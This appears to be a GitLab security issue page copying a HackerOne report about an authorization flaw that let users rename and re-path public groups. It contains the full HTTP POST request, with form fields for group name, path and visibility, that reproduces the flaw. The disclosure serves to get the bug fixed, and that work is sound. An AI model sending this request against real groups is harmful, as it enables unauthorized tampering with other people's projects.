Skip to content

A user can change the name and path of some public GitLab groups

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2035687 by zeb0x01 on 2023-06-23, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Summary

The following vulnerability allows an attacker to change a public gitlab groups name by just a POST request.

Steps to reproduce
  1. Send the following request with cookies.
POST /-/subscriptions/groups/<GROUP_NAME> HTTP/2  
Host: gitlab.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/-/subscriptions/groups/gitlab-org  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 210  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers

_method=patch&authenticity_token=[REDACTED]&new_user=true&group%5Bname%5D=<group_name>&group%5Bpath%5D=<group_path>&group%5Bvisibility_level%5D=20
Impact

Unauthorized access / change leading to change in group name of any public group

Relevant logs and/or screenshots

Impact

Unauthorized access / change leading to change in group name of any public group

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim